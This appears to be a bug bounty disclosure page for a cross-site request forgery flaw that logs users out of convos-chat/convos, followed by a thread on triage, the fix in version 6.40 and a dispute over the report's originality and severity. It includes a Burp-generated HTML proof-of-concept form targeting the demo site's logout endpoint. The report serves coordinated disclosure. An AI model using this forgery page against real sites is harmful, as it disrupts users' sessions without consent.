Cross-Site Request Forgery (CSRF) in convos-chat/convos

Valid

Reported on

Dec 11th 2021


Description

An attacker is able to log out a user if a logged-in user visits the attacker's website.

Proof of Concept

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.convos.chat/logout">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

This vulnerability is capable of forging users to unintentional logout.

More Detail

One way GET could be abused here is that a person (competitor perhaps:) placed an image tag with src="<your logout link>" anywhere on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out. This is why it should be a POST with a CSRF token.

Note

While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.

We are processing your report and will contact the convos-chat/convos team within 24 hours. a year ago
Devendra Bhatla
a year ago

Researcher


@admin Please contact on contact@convos.chat to the maintainer.

We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
Jamie Slome
a year ago

Admin


@dev696 - I have commented on the GitHub Issue! I have shared the report URL with them if they want to view the report directly. Otherwise, once they have added an e-mail to the SECURITY.md, they will receive a magic link to access the page.

Devendra Bhatla
a year ago

Researcher


@Jamie, I believe we can considered the shared email "contact@convos.chat" You can share all the details as this is the main contact. Also the URL is private and cannot be viewed. Thanks for your support as always.

We have contacted a member of the convos-chat/convos team and are waiting to hear back a year ago
Jamie Slome
a year ago

Admin


Sorted! ūüéä

A convos-chat/convos maintainer validated this vulnerability a year ago
Devendra Bhatla has been awarded the disclosure bounty
The fix bounty is now up for grabs
A convos-chat/convos maintainer marked this as fixed in 6.40 with commit a2d265 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
ChatSidebar.svelte#L233 has been validated
A convos-chat/convos maintainer
a year ago

Maintainer


Thanks for reporting this through e-mail, instead of posting it online before having a chance to fix it.

I did consider this a minor issue. I think even bigger sites like Google also does not protect the /logout endpoint. Nevertheless, the fix was simple to add, so why not? :)

KhanhCM
a year ago

Hey @dev696,

A real researcher will not just copy all the content from other reports. You should try to write your reports by yourself.

Furthermore, the severity for this vulnerability is not High, it's Medium (CVSS from 4.3 to 6.5, maybe). You can check it on some reports or CVEs. The convos' s users will be shocked if they know that their app has a High vulnerability with the impact is just logging out a user with no affected on the account, just an annoyance!

to join this conversation